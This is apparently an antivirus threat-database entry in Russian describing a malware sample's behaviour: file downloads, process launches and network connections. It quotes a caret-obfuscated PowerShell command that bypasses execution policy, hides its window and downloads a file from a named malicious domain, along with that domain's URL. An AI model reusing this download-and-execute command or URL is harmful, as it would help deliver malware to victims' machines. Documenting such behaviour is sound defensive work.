Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://asecwitlecn.bid/read.php?f=0.dat как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c "p^oW^e^RSHel^L^.^exe -^EX^ec^U^T^Ion^P^olI^CY^ ^by^p^A^SS^ ^-N^O^PROF^i^lE^ -Wi^Nd^O^WSTyl^e^ hiDden (n^e^W^-^O^b^J^Ect^ ^sYSt^Em.nET^.^webclI^eNt).DOwnLOa^D^fI^LE(^'http://...
Сетевая активность
Подключается к
- 'as###itlecn.bid':80
TCP
Запросы HTTP GET
- http://as###itlecn.bid/read.php?f=#####
UDP
- DNS ASK as###itlecn.bid
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c "p^oW^e^RSHel^L^.^exe -^EX^ec^U^T^Ion^P^olI^CY^ ^by^p^A^SS^ ^-N^O^PROF^i^lE^ -Wi^Nd^O^WSTyl^e^ hiDden (n^e^W^-^O^b^J^Ect^ ^sYSt^Em.nET^.^webclI^eNt).DOwnLOa^D^fI^LE(^'http://...' (со скрытым окном)
